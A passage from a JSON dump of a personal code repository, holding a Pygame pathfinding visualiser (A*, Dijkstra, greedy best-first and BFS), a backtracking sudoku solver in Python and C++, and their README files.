current\r\n\t\t\t\tg_score[neighbor] = temp_g_score\r\n\t\t\t\tif neighbor not in open_set_hash:\r\n\t\t\t\t\tcount += 1\r\n\t\t\t\t\topen_set.put((g_score[neighbor], count, neighbor))\r\n\t\t\t\t\topen_set_hash.add(neighbor)\r\n\t\tdraw()\r\n\t\tif current != start:\r\n\t\t\tcurrent.make_closed()\r\n\r\n\treturn False\r\n\r\n#Greedy best first search, with manhattan dist\r\ndef greedy(draw, grid, start, end):\r\n\t#to get the min element, x value as tie braker\r\n\topen_set = PriorityQueue()\r\n\topen_set.put((0, start.get_pos()[1], start))\r\n\t#dictionary to assign nodes to nodes to create the shortest path\r\n\tcame_from = {}\r\n\t#heuristic, manhattan dist\r\n\tf_score = {spot: float(\"inf\") for row in grid for spot in row}\r\n\tf_score[start] = h(start.get_pos(), end.get_pos())\r\n\topen_set_hash = {start}\r\n\r\n\twhile not open_set.empty():\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tpygame.quit()\r\n\t\t#get the minimum val node\r\n\t\tcurrent = open_set.get()[2]\r\n\t\topen_set_hash.remove(current)\r\n\t\t#shortest path found\r\n\t\tif current == end:\r\n\t\t\treconstruct_path(came_from, start, end, draw)\r\n\t\t\tend.make_end()\r\n\t\t\treturn True\r\n\r\n\t\tfor neighbor in current.neighbors:\r\n\t\t\t\t#add neighbor to the stack, if it hasn't been visited yet\r\n\t\t\t\tif neighbor not in open_set_hash and not neighbor.is_closed():\r\n\t\t\t\t\t# calculate the heuristics for the neighbors\r\n\t\t\t\t\tf_score[neighbor] = h(neighbor.get_pos(), end.get_pos())\r\n\t\t\t\t\tif current != start:\r\n\t\t\t\t\t\tcame_from[neighbor] = current\r\n\t\t\t\t\topen_set.put((f_score[neighbor], neighbor.get_pos()[1], neighbor))\r\n\t\t\t\t\topen_set_hash.add(neighbor)\r\n\t\tdraw()\r\n\r\n\t\tif current != start:\r\n\t\t\tcurrent.make_closed()\r\n\r\n\treturn False\r\n\r\n#data structure for the grid\r\ndef make_grid(rows, width):\r\n\tgrid = []\r\n\t#how large a button is going to be\r\n\tgap = width // rows\r\n\tfor i in range(rows):\r\n\t\tgrid.append([])\r\n\t\tfor j in range(rows):\r\n\t\t\tspot = Spot(i, j, gap, rows)\r\n\t\t\tgrid[i].append(spot)\r\n\treturn grid\r\n\r\n#draw the grid lines\r\ndef draw_grid(win, rows, width):\r\n\tgap = width // rows\r\n\tfor i in range(rows):\r\n\t\t#drawing horizontal lines x1 y1 x2 y2\r\n\t\tpygame.draw.line(win, GREY, (0, i * gap), (width, i * gap))\r\n\t\tfor j in range(rows+1):\r\n\t\t\t# drawing vert lines x1 y1 x2 y2\r\n\t\t\tpygame.draw.line(win, GREY, (j * gap, 0), (j * gap, width))\r\n\r\n#drawing a text at pos x,y\r\ndef draw_text(text, font, color, surface, x, y):\r\n\ttextobj = font.render(text, 1, color)\r\n\ttextrect = textobj.get_rect()\r\n\ttextrect.topleft = (x, y)\r\n\tsurface.blit(textobj, textrect)\r\n\r\n#drawing the buttons for the algo selection\r\ndef draw_button(win, rows, width, text, font, color, y):\r\n\tDARKBLUE = [0, 8, 78]\r\n\tLBLUE = [0, 19, 195]\r\n\trow_width = width / rows\r\n\t#outer rectangle\r\n\tpygame.draw.rect(win, DARKBLUE, (width + 2, y, row_width * 11, row_width * 3.5))\r\n\t#inner\r\n\tpygame.draw.rect(win, LBLUE, (width + 7, y+5, row_width * 11 - 10, row_width * 3.5 - 10))\r\n\ttextcolor = WHITE\r\n\t#if selected color = Yellow\r\n\tif color:\r\n\t\ttextcolor = YELLOW\r\n\tdraw_text(text, font, textcolor, win, width + 12, y+20)\r\n\r\n#a faster drawing algo for the search algorithms, to only update the grid structure\r\ndef draw(win, grid, rows, width):\r\n\tfor row in grid:\r\n\t\tfor spot in row:\r\n\t\t\t# drawing the rectangles\r\n\t\t\tspot.draw(win)\r\n\t# drawing the grid\r\n\tdraw_grid(win, rows, width)\r\n\tpygame.display.update()\r\n\r\n#drawing visualization with the menu\r\ndef draw2(win, grid, rows, width, colorMatrix):\r\n\t#initializing every window in white\r\n\twin.fill(WHITE)\r\n\tfor row in grid:\r\n\t\tfor spot in row:\r\n\t\t\t#drawing the rectangles\r\n\t\t\tspot.draw(win)\r\n\t#drawing the grid\r\n\tdraw_grid(win, rows, width)\r\n\t#selecting font\r\n\tpygame.font.init()\r\n\tfont = pygame.font.Font('freesansbold.ttf', 20)\r\n\r\n\t#drawing the left mouse icon\r\n\tmouseImg = pygame.image.load('mouse_button.png')\r\n\tscaled = pygame.transform.scale(mouseImg, (50, 60))\r\n\tWIN.blit(scaled, (width + 2, 0))\r\n\tdraw_text('draw/select', font, BLACK, win, width + 55, 30)\r\n\r\n\t#drawing the right mouse icon\r\n\tmouseImg = pygame.image.load('right_button.png')\r\n\tscaled = pygame.transform.scale(mouseImg, (50, 60))\r\n\tWIN.blit(scaled, (width + 2, 70))\r\n\tdraw_text('delete', font, BLACK, win, width + 55, 100)\r\n\r\n\t#the spacebar\r\n\tspacebar = pygame.image.load('spacebar.jpg')\r\n\tscaled = pygame.transform.scale(spacebar, (80, 30))\r\n\tWIN.blit(scaled, (width + 2, 150))\r\n\tdraw_text('run', font, BLACK, win, width + 90, 155)\r\n\r\n\t#key c\r\n\tkey_c = pygame.image.load('key_c.png')\r\n\tscaled = pygame.transform.scale(key_c, (50, 50))\r\n\tWIN.blit(scaled, (width + 2, 190))\r\n\tdraw_text('reset grid', font, BLACK, win, width + 55, 205)\r\n\r\n\t#drawing the buttons for the algo selection\r\n\tbuttonNames = [\"A*\", \"Greedy BFS\", \"DIJK\", \"BFS\"]\r\n\tbuttonPos = 250\r\n\tfor i,name in enumerate(buttonNames):\r\n\t\tdraw_button(win, rows, width, name, font, colorMatrix[i], buttonPos)\r\n\t\t#60 is the height of a button\r\n\t\tbuttonPos += 60\r\n\r\n\tpygame.display.update()\r\n\r\n\r\n\r\n#getting the node that we clicked at\r\ndef get_clicked_pos(pos, rows, width):\r\n\tgap = width // rows\r\n\ty, x = pos\r\n\trow = y // gap\r\n\tcol = x // gap\r\n\treturn row, col\r\n\r\ndef main(win, width):\r\n\t#matrix for button selection\r\n\tcolorMatrix = [0, 0, 0, 0]\r\n\t#number of cubes/nodes\r\n\tROWS = 50\r\n\tgrid = make_grid(ROWS, width)\r\n\tstart = None\r\n\tend = None\r\n\trun = True\r\n\tdraw2(win, grid, ROWS, width, colorMatrix)\r\n\r\n\twhile run:\r\n\t\t#checking for user input\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\trun = False\r\n\r\n\t\t\tif pygame.mouse.get_pressed()[0]: # LEFT\r\n\r\n\t\t\t\t#where we pressed\r\n\t\t\t\tpos = pygame.mouse.get_pos()\r\n\r\n\t\t\t\tlimits = grid[0][0].total_rows * grid[0][0].width\r\n\r\n\t\t\t\tif pos[0] > limits:\r\n\t\t\t\t\t#Button/Algo selection\r\n\t\t\t\t\t#resetting the value\r\n\t\t\t\t\tif 250 < pos[1] < 490:\r\n\t\t\t\t\t\tfor i in range(4):\r\n\t\t\t\t\t\t\tcolorMatrix[i] = 0\r\n\t\t\t\t\t#setting new value\r\n\t\t\t\t\tif 250 < pos[1] < 310:\r\n\t\t\t\t\t\t#A*\r\n\t\t\t\t\t\tcolorMatrix[0] = 1\r\n\t\t\t\t\telif 310 < pos[1] < 370:\r\n\t\t\t\t\t\t#Greedy\r\n\t\t\t\t\t\tcolorMatrix[1] = 1\r\n\t\t\t\t\telif 370 < pos[1] < 430:\r\n\t\t\t\t\t\t#DJK\r\n\t\t\t\t\t\tcolorMatrix[2] = 1\r\n\t\t\t\t\telif 430 < pos[1] < 490:\r\n\t\t\t\t\t\t# BFS\r\n\t\t\t\t\t\tcolorMatrix[3] = 1\r\n\t\t\t\t\tdraw2(win, grid, ROWS, width, colorMatrix)\r\n\t\t\t\t#A position within the grid was selected\r\n\t\t\t\telse:\r\n\t\t\t\t\trow, col = get_clicked_pos(pos, ROWS, width)\r\n\t\t\t\t\tspot = grid[row][col]\r\n\t\t\t\t\t#assigning start node\r\n\t\t\t\t\tif not start and spot != end:\r\n\t\t\t\t\t\tstart = spot\r\n\t\t\t\t\t\tstart.make_start()\r\n\t\t\t\t\t#assigning end node\r\n\t\t\t\t\telif not end and spot != start:\r\n\t\t\t\t\t\tend = spot\r\n\t\t\t\t\t\tend.make_end()\r\n\t\t\t\t\t#drawing barriers\r\n\t\t\t\t\telif spot != end and spot != start:\r\n\t\t\t\t\t\tspot.make_barrier()\r\n\r\n\t\t\t\tdraw(win, grid, ROWS, width)\r\n\r\n\t\t\telif pygame.mouse.get_pressed()[2]: # RIGHT\r\n\t\t\t\tpos = pygame.mouse.get_pos()\r\n\t\t\t\trow, col = get_clicked_pos(pos, ROWS, width)\r\n\t\t\t\tspot = grid[row][col]\r\n\t\t\t\t#delete nodes with a right click\r\n\t\t\t\tspot.reset()\r\n\t\t\t\tif spot == start:\r\n\t\t\t\t\tstart = None\r\n\t\t\t\telif spot == end:\r\n\t\t\t\t\tend = None\r\n\r\n\t\t\t\tdraw(win, grid, ROWS, width)\r\n\r\n\t\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\t\t#spacebar = run the algo\r\n\t\t\t\tif event.key == pygame.K_SPACE and start and end:\r\n\t\t\t\t\t#determine which algo was selected\r\n\t\t\t\t\tfor row in grid:\r\n\t\t\t\t\t\tfor spot in row:\r\n\t\t\t\t\t\t\tspot.update_neighbors(grid)\r\n\t\t\t\t\talgo = -1\r\n\t\t\t\t\tfor i,value in enumerate(colorMatrix):\r\n\t\t\t\t\t\tif value:\r\n\t\t\t\t\t\t\talgo = i\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tif algo == 0:\r\n\t\t\t\t\t\talgorithm(lambda: draw(win, grid, ROWS, width), grid, start, end)\r\n\t\t\t\t\telif algo == 1:\r\n\t\t\t\t\t\tgreedy(lambda: draw(win, grid, ROWS, width), grid, start, end)\r\n\t\t\t\t\telif algo == 2:\r\n\t\t\t\t\t\tdijk(lambda: draw(win, grid, ROWS, width), grid, start, end)\r\n\t\t\t\t\telif algo == 3:\r\n\t\t\t\t\t\tbfs(lambda: draw(win, grid, ROWS, width), grid, start, end)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tNone\r\n\t\t\t\t\tdraw(win, grid, ROWS, width)\r\n\r\n\t\t\t\t\t#resetting the algo colors afterwards\r\n\t\t\t\t\tfor i in range(ROWS):\r\n\t\t\t\t\t\tfor j in range(ROWS):\r\n\t\t\t\t\t\t\tif not grid[i][j].is_barrier() and grid[i][j] != start and grid[i][j] != end:\r\n\t\t\t\t\t\t\t\tgrid[i][j].color = WHITE\r\n\r\n\t\t\t\t#deleting the grid on key press \"c\"\r\n\t\t\t\tif event.key == pygame.K_c:\r\n\t\t\t\t\tstart = None\r\n\t\t\t\t\tend = None\r\n\t\t\t\t\tgrid = make_grid(ROWS, width)\r\n\t\t\t\t\tdraw(win, grid, ROWS, width)\r\n\r\n\tpygame.quit()\r\n\r\nmain(WIN, WIDTH)"
},
{
"alpha_fraction": 0.4368287920951843,
"alphanum_fraction": 0.4810486435890198,
"avg_line_length": 31.680850982666016,
"blob_id": "9349e9a391528b5abdcbd38b86d3047440f43cef",
"content_id": "29ae54cb1d9453dc414783178d2ee45b962a8593",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3166,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 94,
"path": "/sudoku_solver/sudoku.py",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "import time\r\n\r\nboard = [\r\n [0,0,0,0,0,0,0,0,1],\r\n [0,0,0,0,1,0,2,3,0],\r\n [0,0,8,4,3,0,0,0,7],\r\n [0,9,6,0,2,7,0,4,8],\r\n [0,0,0,0,0,9,0,0,0],\r\n [0,5,0,0,0,0,0,0,0],\r\n [0,0,4,0,0,5,0,0,0],\r\n [0,0,0,0,9,0,1,0,0],\r\n [9,8,2,7,0,0,0,0,0]\r\n]\r\n\r\n#board output\r\ndef output_sudoku(sudoku):\r\n for i in range(len(sudoku)):\r\n if i % 3 == 0 :\r\n print(\" - - - - - - - - - - - - - - \")\r\n for j in range(len(sudoku[1])):\r\n if j % 3 == 0:\r\n print(\" | \",end=\"\")\r\n if j == 8:\r\n print(str(sudoku[i][j])+\" | \")\r\n else:\r\n print(str(sudoku[i][j]) + \" \",end=\"\")\r\n\r\n#checking whether the value in x,y fulfills the sudoku rules\r\ndef check_rules(x,y,sudoku):\r\n value=sudoku[y][x]\r\n #checking if the value is already in the same row or column\r\n for i in range(len(sudoku)):\r\n if sudoku[y][i] == value and i != x:\r\n return False\r\n if sudoku[i][x] == value and i != y:\r\n return False\r\n #checking if the value is in the same box\r\n #finding the box\r\n xmin = x // 3\r\n ymin = y // 3\r\n for i in range(ymin * 3, ymin * 3 + 3):\r\n for j in range(xmin * 3, xmin * 3 + 3):\r\n if sudoku[i][j] == value and i != y and j != x:\r\n return False\r\n return True\r\n\r\n#if empty entry found, return the coordinates, if not return (-1,-1)\r\n#just have to look at the entries for j>=y\r\ndef find_empty(y,sudoku):\r\n for j in range(y, len(sudoku)):\r\n for i in range(len(sudoku)):\r\n if sudoku[j][i] == 0:\r\n return (i,j)\r\n return (-1,-1)\r\n\r\n#the backtracking solver\r\ndef backtracking_solver(sudoku):\r\n #instead of recursion, I used a stack\r\n stack = []\r\n #starting point (x,y)-coordinate\r\n pos=(0,0)\r\n pos = find_empty(pos[1],sudoku)\r\n #until there are zeros in the array\r\n while pos[0] != -1:\r\n #since it makes no sense to begin at 0\r\n sudoku[pos[1]][pos[0]] = 1\r\n value = 1\r\n #backtracking algo\r\n while not check_rules(pos[0],pos[1],sudoku):\r\n #if value == 9 and still no solution found, we want to go back in the list\r\n if value == 9:\r\n sudoku[pos[1]][pos[0]] = 0\r\n pos = stack.pop()\r\n #increase the popped value (backtracking algo)\r\n value = sudoku[pos[1]][pos[0]] + 1\r\n sudoku[pos[1]][pos[0]] = value\r\n #special case, if we grab a 9, we want to go back further\r\n if value > 9:\r\n sudoku[pos[1]][pos[0]] = 0\r\n pos = stack.pop()\r\n value = sudoku[pos[1]][pos[0]] + 1\r\n sudoku[pos[1]][pos[0]] = value\r\n else:\r\n #iterate from 1-8\r\n sudoku[pos[1]][pos[0]] += 1\r\n value = sudoku[pos[1]][pos[0]]\r\n #append the entry and look for the next zero\r\n stack.append(pos)\r\n pos = find_empty(pos[1],sudoku)\r\n\r\nstart_time = time.time()\r\nbacktracking_solver(board)\r\noutput_sudoku(board)\r\nprint(\"\\n\\n%s seconds\" % (time.time() - start_time))\r\n"
},
{
"alpha_fraction": 0.7582417726516724,
"alphanum_fraction": 0.7655677795410156,
"avg_line_length": 132.5,
"blob_id": "afc2dbbdc964bb902b1ed2506f440bdbfd3e80fa",
"content_id": "be7c38ed5cb88ee7392d74345abb1168990d74cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 250,
"num_lines": 2,
"path": "/sudoku_solver/README.md",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "# Sudoku Solver\r\nFor this project I implemented a Sudoku solver (for a 9x9 grid) with a non-recursive Backtracking algorithm (in C++ and Python). The plan is to extend this project in the future, by reading Sudokus with text recognition (OCR) into the data structure.\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.4185585081577301,
"alphanum_fraction": 0.44456690549850464,
"avg_line_length": 29.075342178344727,
"blob_id": "a46fce245e512d24c542c41d8985bdd71c17044c",
"content_id": "0b42102d2c0e2de8b735a7cdeb4ec0c1160f7911",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4537,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 146,
"path": "/sudoku_solver/sudoku.cpp",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "#include <iostream>\r\n#include <vector>\r\n#include <stack>\r\n\r\n\r\n//outputting the board\r\nvoid out_sudoku(const std::vector<std::vector<short>>& sudoku)\r\n{\r\n for (auto i = sudoku.begin(); i != sudoku.end(); ++i)\r\n {\r\n if (std::distance(sudoku.begin(), i) % 3 == 0)\r\n std::cout << \" - - - - - - - - - - - - - - \" << std::endl;\r\n\r\n for (auto j = i->begin(); j != i->end(); ++j)\r\n {\r\n if (std::distance(i->begin(), j) % 3 == 0)\r\n {\r\n std::cout << \" | \";\r\n }\r\n if (std::distance(i->begin(), j) == 8)\r\n {\r\n std::cout << *j << \" | \" << std::endl;\r\n }\r\n else\r\n {\r\n std::cout << *j << \" \";\r\n }\r\n }\r\n }\r\n std::cout << \" - - - - - - - - - - - - - - \" << std::endl; \r\n\r\n}\r\n\r\n//checks whether the new value at the position pair fullfills the sudoku rules\r\nbool check_rules(const std::pair<short, short>& pos, const std::vector<std::vector<short>>& sudoku) \r\n{\r\n short value = sudoku[pos.second][pos.first];\r\n //checking rows and columns\r\n for (short i = 0; i < sudoku.size(); i++) \r\n {\r\n if (sudoku[pos.second][i] == value && i != pos.first)\r\n {\r\n return false;\r\n }\r\n if (sudoku[i][pos.first] == value && i != pos.second)\r\n {\r\n return false;\r\n }\r\n }\r\n //checking the ''square''\r\n short xmin = pos.first / 3;\r\n short ymin = pos.second / 3;\r\n for (short i = ymin * 3; i < ymin * 3 + 3; i++)\r\n for (short j = xmin * 3; j < xmin * 3 + 3; j++)\r\n if (sudoku[i][j] == value && i != pos.second && j != pos.first)\r\n {\r\n return false;\r\n }\r\n return true;\r\n}\r\n\r\n\r\n\r\n//find the next empty entry in the board, return it's pos\r\n//return (-1,-1) if the board is already full\r\nstd::pair<short, short> find_empty(const std::vector<std::vector<short>>& sudoku) \r\n{\r\n for (auto i = sudoku.begin(); i != sudoku.end(); ++i)\r\n for (auto j = i->begin(); j != i->end(); ++j)\r\n if (*j == 0)\r\n {\r\n //returning j,i coordinates\r\n return std::make_pair(std::distance(i->begin(), j), std::distance(sudoku.begin(), i));\r\n }\r\n return { -1,-1 };\r\n}\r\n\r\n\r\n//the backtracking algo\r\nvoid solver(std::vector<std::vector<short>>& sudoku) \r\n{\r\n short value;\r\n //stack to avoid recursion\r\n std::stack<std::pair<short,short>> last_pos;\r\n //starting point\r\n std::pair<short, short> pos = { 0, 0 };\r\n pos = find_empty(sudoku);\r\n while (pos.second != -1) \r\n {\r\n //every new value is set to 1\r\n sudoku[pos.second][pos.first] = 1;\r\n value = 1;\r\n while (!check_rules(pos, sudoku)) \r\n {\r\n //if still no solution and val=9, go back in the stack, backtracking...\r\n if (value == 9) \r\n {\r\n sudoku[pos.second][pos.first] = 0;\r\n pos = last_pos.top();\r\n last_pos.pop();\r\n //increase the old value by one, backtracking...\r\n value = sudoku[pos.second][pos.first] + 1;\r\n sudoku[pos.second][pos.first] = value;\r\n //special case, if the previous val was already 9, go back further\r\n if (value > 9) \r\n {\r\n sudoku[pos.second][pos.first] = 0;\r\n pos = last_pos.top();\r\n last_pos.pop();\r\n value = sudoku[pos.second][pos.first] + 1;\r\n sudoku[pos.second][pos.first] = value;\r\n }\r\n }\r\n //iterating through 1-9, checking for a solution\r\n else \r\n {\r\n sudoku[pos.second][pos.first] += 1;\r\n value = sudoku[pos.second][pos.first];\r\n }\r\n }\r\n //adding the temporary solution to the stack and finding the next 0\r\n last_pos.push(pos);\r\n pos = find_empty(sudoku);\r\n }\r\n out_sudoku(sudoku);\r\n}\r\n\r\n\r\nint main(){\r\n std::vector<std::vector<short>> board = {\r\n {0,0,0,0,0,0,0,0,1},\r\n {0,0,0,0,1,0,2,3,0},\r\n {0,0,8,4,3,0,0,0,7},\r\n {0,9,6,0,2,7,0,4,8},\r\n {0,0,0,0,0,9,0,0,0},\r\n {0,5,0,0,0,0,0,0,0},\r\n {0,0,4,0,0,5,0,0,0},\r\n {0,0,0,0,9,0,1,0,0},\r\n {9,8,2,7,0,0,0,0,0}\r\n\r\n };\r\n //solver(board);\r\n out_sudoku(board);\r\n std::cout << \"The solution is:\" << std::endl;\r\n solver(board);\r\n}\r\n"
},
{
"alpha_fraction": 0.677647054195404,
"alphanum_fraction": 0.6820167899131775,
"avg_line_length": 28.16666603088379,
"blob_id": "6f5c90a0b88712a908ac4c9275b77bea53c413ec",
"content_id": "197a2db5e7b71b828cd2f69d19f42bf4fd81a25d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8925,
"license_type": "no_license",
"max_line_length": 323,
"num_lines": 306,
"path": "/pathfinding_algorithms/README.md",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "# Pathfinding Algorithms\nI implemented the A*, Dijkstra, Greedy Best First Search and the Breadth-First Search algorithm with a Pygame GUI (path_algos.py).\n\nIn this example, the Dijkstra algorithm can be seen. The orange node depicts the start point, the turquoise node the end point and black nodes correspond to an obstacle. The algorithm proceeds through the grid and marks visited nodes in light blue. Finally, the shortest path between the two nodes is highlighted in yellow.\n\n\n\n## Requirements\nPygame, key_c.png, mouse_button.png, right_button.png and spacebar.jpg\n\n## Instruction\nThe start and end nodes can be set through left clicks with the mouse at the grid GUI. After the first two clicks, obstacles can be drawn into the grid structure.\n\n\nThe user chooses between algorithms by clicking at the algorithm's name. By pressing the spacebar, the algorithm starts to work through the grid.\n\n\nNodes in the grid can be deleted with right clicks.\n\n\nTo clear the grid, press \"c\"\n\n\n\n## Algorithms\n### The Grid structure\nThe node class\n```\n#node structure for the grid (x,y). every node is connected with maximum 4 neighbors. stored in neighbors\n#diagonal connections are not allowed.\n#a spot also holds a color for the visualization\nclass Spot:\n\tdef __init__(self, row, col, width, total_rows):\n\t\tself.row = row\n\t\tself.col = col\n\t\tself.x = row * width\n\t\tself.y = col * width\n\t\t#unaccessed color = white\n\t\tself.color = WHITE\n\t\tself.neighbors = []\n\t\tself.width = width\n\t\tself.total_rows = total_rows\n\t\t#the color might changes after a certain step interval\n\t\tself.time_effekt = 0\n\n\tdef get_pos(self):\n\t\treturn self.row, self.col\n\n\tdef is_closed(self):\n\t\treturn self.color == RED\n\n\tdef is_open(self):\n\t\treturn self.color == GREEN\n\n\tdef is_barrier(self):\n\t\treturn self.color == BLACK\n\n\tdef is_start(self):\n\t\treturn self.color == ORANGE\n\n\tdef is_end(self):\n\t\treturn self.color == TURQUOISE\n\n\tdef reset(self):\n\t\tself.color = WHITE\n\n\tdef make_start(self):\n\t\tself.color = ORANGE\n\n\t#after 7 steps, change the color\n\tdef make_closed(self):\n\t\tself.color = RED\n\t\tself.time_effekt = 7\n\n\tdef make_open(self):\n\t\tself.color = GREEN\n\n\tdef make_barrier(self):\n\t\tself.color = BLACK\n\n\tdef check_barrier(self):\n\t\tif self.color == BLACK:\n\t\t\treturn True\n\n\tdef make_end(self):\n\t\tself.color = TURQUOISE\n\n\tdef make_path(self):\n\t\tself.color = YELLOW\n\n\tdef draw(self, win):\n\t\t#change the color after a certain step interval\n\t\tif self.time_effekt > 0 and self.is_closed():\n\t\t\tpygame.draw.rect(win, EFFECTCOLOR, (self.x, self.y, self.width, self.width))\n\t\t\tself.time_effekt += -1\n\t\telse:\n\t\t\tpygame.draw.rect(win, self.color, (self.x, self.y, self.width, self.width))\n\n\t#assigns all the possible neighbors (max:D,U,R,L), barriers for example are not allowed to be a neighbor\n\tdef update_neighbors(self, grid):\n\t\tself.neighbors = []\n\t\t# can still move down is not a barrier\n\t\tif self.row < self.total_rows - 1 and not grid[self.row + 1][self.col].is_barrier(): # DOWN\n\t\t\tself.neighbors.append(grid[self.row + 1][self.col])\n\t\t#(0,0) is the upper right corner\n\t\tif self.row > 0 and not grid[self.row - 1][self.col].is_barrier(): # UP\n\t\t\tself.neighbors.append(grid[self.row - 1][self.col])\n\t\t# number of rows=number of columns\n\t\tif self.col < self.total_rows - 1 and not grid[self.row][self.col + 1].is_barrier(): # RIGHT\n\t\t\tself.neighbors.append(grid[self.row][self.col + 1])\n\n\t\tif self.col > 0 and not grid[self.row][self.col - 1].is_barrier(): # LEFT\n\t\t\tself.neighbors.append(grid[self.row][self.col - 1])\n\n\tdef __lt__(self, other):\n\t\treturn False\n ```\n\nAnd the grid initializer\n ```\n#data structure for the grid\ndef make_grid(rows, width):\n\tgrid = []\n\t#how large a button is going to be\n\tgap = width // rows\n\tfor i in range(rows):\n\t\tgrid.append([])\n\t\tfor j in range(rows):\n\t\t\tspot = Spot(i, j, gap, rows)\n\t\t\tgrid[i].append(spot)\n\treturn grid\n ```\n \n### A*\n```#A* algo\ndef algorithm(draw, grid, start, end):\n\t#to get a tie braker for equal fs\n\tcount = 0\n\t#to get the min element\n\topen_set = PriorityQueue()\n\topen_set.put((0, count, start))\n\t#dictionary to assign nodes to nodes to create the shortest path\n\tcame_from = {}\n\t#setting g and f scores to inf at the beginning, except for the start pos\n\tg_score = {spot: float(\"inf\") for row in grid for spot in row}\n\tg_score[start] = 0\n\tf_score = {spot: float(\"inf\") for row in grid for spot in row}\n\t#manhattan dist\n\tf_score[start] = h(start.get_pos(), end.get_pos())\n\topen_set_hash = {start}\n\n\twhile not open_set.empty():\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t#get the minimum val node\n\t\tcurrent = open_set.get()[2]\n\t\topen_set_hash.remove(current)\n\t\t#shortest path found\n\t\tif current == end:\n\t\t\treconstruct_path(came_from, start, end, draw)\n\t\t\tend.make_end()\n\t\t\treturn True\n\n\t\tfor neighbor in current.neighbors:\n\t\t\t#updating the g_score for the neighbors\n\t\t\ttemp_g_score = g_score[current] + 1\n\t\t\t#if a neighbor has a new lower value, save the new val\n\t\t\tif temp_g_score < g_score[neighbor]:\n\t\t\t\tcame_from[neighbor] = current\n\t\t\t\tg_score[neighbor] = temp_g_score\n\t\t\t\t#manhattan dist + steps\n\t\t\t\tf_score[neighbor] = temp_g_score + h(neighbor.get_pos(), end.get_pos())\n\t\t\t\tif neighbor not in open_set_hash:\n\t\t\t\t\tcount += 1\n\t\t\t\t\topen_set.put((f_score[neighbor], count, neighbor))\n\t\t\t\t\topen_set_hash.add(neighbor)\n\t\tdraw()\n\t\tif current != start:\n\t\t\tcurrent.make_closed()\n\treturn False\n ```\n\n### Dijkstra\n```\n#dij\ndef dijk(draw, grid, start, end):\n\t#to get a tie braker for equal fs\n\tcount = 0\n\t#to get the min element\n\topen_set = PriorityQueue()\n\topen_set.put((0, count, start))\n\t#dictionary to assign nodes to nodes to create the shortest path\n\tcame_from = {}\n\tg_score = {spot: float(\"inf\") for row in grid for spot in row}\n\tg_score[start] = 0\n\topen_set_hash = {start}\n\n\twhile not open_set.empty():\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t#get the minimum val node\n\t\tcurrent = open_set.get()[2]\n\t\topen_set_hash.remove(current)\n\t\t#shortest path found\n\t\tif current == end:\n\t\t\treconstruct_path(came_from, start, end, draw)\n\t\t\tend.make_end()\n\t\t\treturn True\n\t\t#if a neighbor has a new lower val, save it\n\t\tfor neighbor in current.neighbors:\n\t\t\ttemp_g_score = g_score[current] + 1\n\t\t\tif temp_g_score < g_score[neighbor]:\n\t\t\t\tcame_from[neighbor] = current\n\t\t\t\tg_score[neighbor] = temp_g_score\n\t\t\t\tif neighbor not in open_set_hash:\n\t\t\t\t\tcount += 1\n\t\t\t\t\topen_set.put((g_score[neighbor], count, neighbor))\n\t\t\t\t\topen_set_hash.add(neighbor)\n\t\tdraw()\n\t\tif current != start:\n\t\t\tcurrent.make_closed()\n\n\treturn False\n```\n\n### Greedy Best First Search, with Manhattan dist\n```\ndef greedy(draw, grid, start, end):\n\t#to get the min element, x value as tie braker\n\topen_set = PriorityQueue()\n\topen_set.put((0, start.get_pos()[1], start))\n\t#dictionary to assign nodes to nodes to create the shortest path\n\tcame_from = {}\n\t#heuristic, manhattan dist\n\tf_score = {spot: float(\"inf\") for row in grid for spot in row}\n\tf_score[start] = h(start.get_pos(), end.get_pos())\n\topen_set_hash = {start}\n\n\twhile not open_set.empty():\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t#get the minimum val node\n\t\tcurrent = open_set.get()[2]\n\t\topen_set_hash.remove(current)\n\t\t#shortest path found\n\t\tif current == end:\n\t\t\treconstruct_path(came_from, start, end, draw)\n\t\t\tend.make_end()\n\t\t\treturn True\n\n\t\tfor neighbor in current.neighbors:\n\t\t\t\t#add neighbor to the stack, if it hasn't been visited yet\n\t\t\t\tif neighbor not in open_set_hash and not neighbor.is_closed():\n\t\t\t\t\t# calculate the heuristics for the neighbors\n\t\t\t\t\tf_score[neighbor] = h(neighbor.get_pos(), end.get_pos())\n\t\t\t\t\tif current != start:\n\t\t\t\t\t\tcame_from[neighbor] = current\n\t\t\t\t\topen_set.put((f_score[neighbor], neighbor.get_pos()[1], neighbor))\n\t\t\t\t\topen_set_hash.add(neighbor)\n\t\tdraw()\n\n\t\tif current != start:\n\t\t\tcurrent.make_closed()\n\n\treturn False\n```\n\n### BFS\n```\n# finds shortest path between 2 nodes of a graph using BFS\ndef bfs(draw, grid, start, end):\n\t# keep track of explored nodes\n\texplored = []\n\t# keep track of all the paths to be checked\n\tqueue = [[start]]\n\n\t# keeps looping until all possible paths have been checked\n\twhile queue:\n\t\t# pop the first path from the queue\n\t\tpath = queue.pop(0)\n\t\t# get the last node from the path\n\t\tnode = path[len(path)-1]\n\n\t\tif node not in explored:\n\t\t\tneighbours = 